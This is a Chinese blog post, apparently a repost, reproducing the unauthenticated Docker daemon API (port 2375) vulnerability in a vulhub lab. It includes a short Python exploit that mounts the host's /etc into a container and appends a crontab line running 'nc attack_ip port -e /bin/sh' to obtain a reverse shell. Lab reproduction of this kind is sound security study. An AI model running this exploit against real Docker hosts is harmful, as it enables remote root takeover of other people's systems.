首页 > Windows开发 > 详细

docker daemon api 未授权访问漏洞复现

时间:2021-04-09 12:39:46      阅读:30      评论:0      收藏:0      [点我收藏+]

docker daemon api 未授权访问漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

技术分享图片

查看监听端口

docker-compose ps

技术分享图片

访问http://target_ip:2375/version

技术分享图片

0x02.漏洞复现

利用方法是,我们随意启动一个容器,并将宿主机的/etc目录挂载到容器中,便可以任意读写文件了。我们可以将命令写入crontab配置文件,进行反弹shell

import docker

client = docker.DockerClient(base_url=‘http://target_ip:2375/‘)
data = client.containers.run(‘alpine:latest‘, r‘‘‘sh -c "echo ‘* * * * * /usr/bin/nc attack_ip port -e /bin/sh‘ >> /tmp/etc/crontabs/root" ‘‘‘, remove=True, volumes={‘/etc‘: {‘bind‘: ‘/tmp/etc‘, ‘mode‘: ‘rw‘}})

技术分享图片

0x03.一点问题

这个我复现的时候换了很多环境,最后是在装有docker的kali环境中成功复现,一般要等一段时间才会连上来

技术分享图片

docker daemon api 未授权访问漏洞复现

原文:https://www.cnblogs.com/-Anguvia-/p/14636424.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!